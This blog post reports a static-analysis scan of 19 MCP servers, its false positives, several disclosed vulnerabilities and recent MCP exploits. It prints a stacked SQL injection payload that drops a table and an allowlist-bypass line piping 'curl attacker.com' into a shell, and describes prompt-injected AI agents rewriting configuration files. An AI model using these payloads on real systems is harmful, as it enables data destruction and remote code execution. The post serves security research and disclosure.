April 19, 2026

We Scanned 19 MCP Servers. Here's What We Found.

We built a static analyzer, pointed it at the most popular MCP servers, and manually triaged every finding. The results challenge assumptions about both automated scanning and MCP security.

Pico

We built a static vulnerability scanner with 14 detection patterns across 7 categories (shell injection, path traversal, SSRF, SQL injection, configuration theater, missing authentication, and hardcoded secrets) and pointed it at 19 of the most popular MCP servers on GitHub.

Then we did the part that most security research skips: we manually triaged every single finding.

The scanner produced 862 findings across those 19 repos. After manual review, the majority were false positives. The real vulnerabilities we found were ones the scanner almost missed. And the most dangerous MCP security issues of 2026, the ones being actively exploited, live in a category that static analysis cannot reach at all.

Here's the full data.

Methodology

Our scanner (source) walks every file in a repository, applies regex-based pattern matching against 14 vulnerability signatures, and produces a weighted score from 0 (clean) to 100 (maximum findings). Each finding is classified as CRITICAL, HIGH, MEDIUM, or LOW based on the pattern type and code context.

What it catches: shell=True with non-literal inputs, multipleStatements: true in MySQL configs, fetch() with non-literal URLs, exec()/execSync() with template literals, hardcoded credentials, path traversal via unsanitized joins, missing authentication on tool registrations.

What it doesn't catch: logic bugs, permission bypasses, supply chain issues, behavioral anomalies, or anything that requires understanding control flow beyond single-file pattern matching.

We know the limitations. That's the point of this article.

The Results

Rank	Repository	Stars	Score	Key Findings	After Triage
1	`awslabs/mcp`	8.8k	100	64 HIGH, 27 MEDIUM	Test fixtures + 1 SSRF worth inspecting
2	`wonderwhy-er/DesktopCommanderMCP`	5.9k	100	17 HIGH, 126 MEDIUM	Shell injection in build scripts, not runtime
3	`googleapis/mcp-toolbox`	14.6k	100	20 HIGH	All in test files (Go)
4	`microsoft/playwright-mcp`	31k	100	4 HIGH, 11 MEDIUM	All in test files
5	`benborla/mcp-server-mysql`	1.5k	100	4 CRITICAL, 4 HIGH, 239 MEDIUM	All CRITICALs false positive
6	`modelcontextprotocol/python-sdk`	N/A	100	1 CRITICAL, 16 HIGH	CRITICAL false positive
7	`modelcontextprotocol/servers`	N/A	100	6 HIGH, 58 MEDIUM	String concat in descriptions, not SQL
8	`idosal/git-mcp`	7.9k	100	5 HIGH, 19 MEDIUM	SSRF in fetch(), warrants inspection
9	`executeautomation/mcp-database-server`	N/A	73	1 CRITICAL, 3 MEDIUM	Real: CVSS 8.8 SQL injection
10	`g0t4/mcp-server-commands`	N/A	72	4 HIGH	`shell:true` by design
11	`firecrawl/firecrawl-mcp-server`	6k	62	1 HIGH, 13 LOW	Test fixture credential
12	`minhalvp/android-mcp-server`	N/A	60	4 HIGH	Real: ADB delegation shell injection
13	`snaggle-ai/openapi-mcp-server`	N/A	32	4 MEDIUM	Low risk
14	`BrowserMCP/mcp`	6.4k	27	1 HIGH, 4 LOW	Low risk
15	`zcaceres/fetch-mcp`	N/A	14	1 MEDIUM	Low risk
16	`designcomputer/mysql_mcp_server`	N/A	8	1 MEDIUM	Low risk
17	`kimtth/mcp-aoai-web-browsing`	N/A	0	None	Clean
18	`mark3labs/mcp-filesystem-server`	N/A	0	None	Clean
19	`github/github-mcp-server`	29k	0	None	Clean

The headline number: 8 repos scored 100/100 on the scanner. After manual triage, zero of those 8 had a CRITICAL vulnerability in their production code.

The repo that did have a confirmed CRITICAL vulnerability (executeautomation/mcp-database-server) scored 73.

The Real Findings

executeautomation/mcp-database-server: SQL Injection (CVSS 8.8)

This is the one we disclosed. The MySQL adapter hardcodes multipleStatements: true, which means semicolon-stacked queries are allowed. The only defense is a startsWith("SELECT") prefix check, trivially bypassed.

SELECT 1; DROP TABLE users; --

This passes the prefix check and executes both statements.

We submitted GHSA-2gc7-7mj4-79wg on April 6, 2026. The maintainer never responded. After 7 days of silence, we executed full public disclosure via oss-security, npm security, and GitHub's security team. The advisory remains in triage. No CVE has been assigned.

The same repo had a previously published vulnerability (CVE-2025-59333, CVSS 8.1) in its PostgreSQL adapter, with the same root cause: string prefix checks as security controls. That CVE was reported by Liran Tal in September 2025. The MySQL adapter vulnerability is the same pattern, unfixed.

mcp-atlassian: SSRF, JQL Injection, XSS

We identified four vulnerabilities in sooperset/mcp-atlassian (4,400+ stars):

High: SSRF via icon_url parameter: unvalidated URL fetched server-side
High: SSRF via attachment URL: unvalidated URL fetched server-side
Medium: JQL injection: unparameterized Jira Query Language construction
Medium: Stored XSS: unsanitized content rendered in Atlassian comments

Coordinated disclosure was sent April 10. At time of writing, the maintainer has not responded despite their own SECURITY.md specifying a 72-hour acknowledgment window.

This is the same mcp-atlassian that was independently targeted by MCPwnfluence (CVE-2026-27825, CVE-2026-27826). That was a separate, more severe vulnerability chain (SSRF + arbitrary file write → unauthenticated RCE) discovered by Pluto Security. Different bugs, same server, same underlying problem: a single-maintainer package connecting AI agents to enterprise infrastructure.

android-mcp-server: Filesystem Write via ADB

Our scanner flagged shell injection patterns in minhalvp/android-mcp-server. Manual review confirmed: the pull_file tool allows arbitrary filesystem write (HIGH), and type_text has a newline injection that enables command execution (MEDIUM). Disclosed April 18, 90-day deadline July 17.

The False Positives That Matter

benborla/mcp-server-mysql: Score 100, All CRITICALs False

The scanner flagged 4 CRITICAL findings in benborla/mcp-server-mysql (1,552 stars, 197 forks). All were false positives.

multipleStatements: true appeared in test setup scripts and inside the bundled mysql2 driver in .smithery/index.cjs, not in production config. The production connection never sets this flag; mysql2 defaults to false.

"SQL injection via string concatenation" was flagged in .smithery/index.cjs at a line that turned out to be node-sql-parser's PEG.js-generated internals doing keyword matching. The parser recognizes SQL; it doesn't construct it.

After deep review, the real concern was MEDIUM-severity: a parser-based permission system that can be bypassed if the operator enables MYSQL_DISABLE_READ_ONLY_TRANSACTIONS=true. Not the catastrophe the scanner suggested.

Lesson: A bundled dependency (mysql2 inside .smithery/) containing multipleStatements: true as a configuration option definition is not the same as application code enabling it. Our scanner didn't know the difference. It should.

Finding	Scanner Says	Reality
`multipleStatements: true`	CRITICAL	In bundled mysql2 driver, not production config
SQL string concatenation	CRITICAL	PEG.js-generated parser internals
Permission bypass	Not flagged	Real MEDIUM risk (requires operator misconfiguration)

modelcontextprotocol/python-sdk: Score 100, CRITICAL False

The official MCP Python SDK got flagged CRITICAL for shell=True in two locations:

Line 48: subprocess.run([cmd, "--version"], check=True, shell=True) where cmd only takes values from the hardcoded list ["npx.cmd", "npx.exe", "npx"]. No user input reaches this call.
Line 279: shell = sys.platform == "win32": conditional Windows-only usage in a local CLI tool (mcp dev). The person running the command is the person providing the input. Attacker equals victim.

Neither is exploitable. Neither affects downstream MCP servers, which import mcp.server, not mcp.cli. The scanner correctly identified shell=True as a dangerous pattern, but context reduces both findings to code quality issues, not vulnerabilities.

The Pattern: High Scanner Scores ≠ Real Vulnerabilities

The data is clear:

8 repos scored 100/100. Zero had confirmed CRITICAL vulnerabilities in production code.
The confirmed CVSS 8.8 vulnerability was in a repo that scored 73.
github/github-mcp-server (29,000 stars, Go) scored 0. Clean.
mark3labs/mcp-filesystem-server (Go) scored 0. Clean.

The two clean repos are both written in Go. Go's strong typing and explicit error handling produce fewer pattern-match surfaces for regex-based scanners. This doesn't mean Go MCP servers are inherently safer; it means our scanner is calibrated for JavaScript/TypeScript/Python idioms.

The deeper insight: test code inflates scores dramatically. Hardcoded credentials in test fixtures, SSRF patterns in test URLs, shell injection in build scripts, all legitimate in their context but all flagged as production vulnerabilities. A scanner that can't distinguish tests/integration/mysql.test.ts from src/db/adapter.ts will systematically overcount.

What Static Analysis Can't See

While we were triaging false positives, the MCP ecosystem experienced its worst month for actual exploitation:

MCPwn (CVE-2026-33032, CVSS 9.8): Two HTTP requests, no authentication, full nginx server takeover. 2,600+ instances exposed. Actively exploited before patches shipped. Discovered by Pluto Security.

MCPwnfluence (CVE-2026-27825, CVE-2026-27826): The most popular Atlassian MCP server. SSRF chained with arbitrary file write for unauthenticated RCE. Two requests, root on your machine.

Ox Security STDIO Injection Class (10+ CVEs): A systemic vulnerability class affecting 150 million downloads and approximately 200,000 instances. The attack surface is MCP's stdio transport, with four vectors: transport type manipulation, prompt injection to malicious configs, direct parameter injection, and allowlist bypasses (e.g., npx -c "curl attacker.com | sh"). CVEs confirmed in Windsurf, Agent Zero, Langchain-Chatchat, Flowise, GPT Researcher, and others.

None of these would have been caught by our scanner. MCPwn is a logic vulnerability in a Go binary. MCPwnfluence is a chained attack requiring understanding of multi-step control flow. The STDIO injection class exploits a fundamental architectural assumption about who controls configuration files.

Static analysis finds patterns. These attacks exploit behavior.

The Trust Gap

Here's what our research tells us when you put the scanner results next to the real-world exploits:

Static scanning is necessary but not sufficient. It catches configuration mistakes (multipleStatements: true in production), obvious injection surfaces, and hardcoded credentials. It does not catch logic bugs, chained attacks, or the new class of agent-mediated vulnerabilities where the "attacker" is a prompt-injected AI modifying configuration files.

The false positive rate for MCP servers is structurally high. MCP servers are designed to execute commands, query databases, and fetch URLs. The patterns that indicate vulnerabilities in web applications are often the intended functionality of MCP tools. A SQL query tool that accepts SQL input is not "SQL injection." A command executor that runs shell commands is not "shell injection." Scanners need MCP-specific context to be useful.

The real risk is behavioral, not structural. Every exploited MCP server in 2026 was compromised through behavioral patterns: what the server did at runtime, not what its code looked like statically. The STDIO injection class is the clearest example. Sanitization was correct at code review time, but an AI agent modified the config at runtime, and no sanitization code ran.

This is the gap that behavioral monitoring addresses. Not "does this code contain dangerous patterns?" but "is this agent doing something behaviorally inconsistent with its authorization?"

What We're Doing About It

We've open-sourced the scanner and the triage methodology. We've updated our detection patterns based on what we learned:

Exclude bundled dependencies: .smithery/, dist/, node_modules/ inflate scores with library internals
Distinguish test from production code: multipleStatements: true in test files is expected
Context-aware injection detection: string concatenation in parser generators is not SQL injection
MCP tool semantics: a SQL query tool that takes SQL input needs different evaluation criteria

But the harder lesson from this research is that better static analysis is not the answer to MCP security. Behavioral monitoring is what catches it: watching what agents actually do at runtime, detecting anomalies that no amount of code scanning can predict.

Run our scanner on your MCP dependencies. It will catch the easy stuff. For everything else, you need eyes on behavior.

npx proof-of-commitment mcp-remote @modelcontextprotocol/server-github

# Or scan the full supply chain
curl -X POST https://poc-backend.amdal-dev.workers.dev/api/graph/npm \
  -H "Content-Type: application/json" \
  -d '{"package": "@modelcontextprotocol/sdk", "depth": 2}'

Web UI: getcommit.dev/audit

Data collected April 19, 2026. Scanner source and methodology at github.com/piiiico/proof-of-commitment. Disclosed vulnerabilities follow coordinated disclosure timelines: executeautomation (GHSA-2gc7-7mj4-79wg, publicly disclosed April 13), mcp-atlassian (coordinated, pending), android-mcp-server (coordinated, 90-day window). We acknowledge limitations in our scanner and continue to improve detection patterns based on triage results.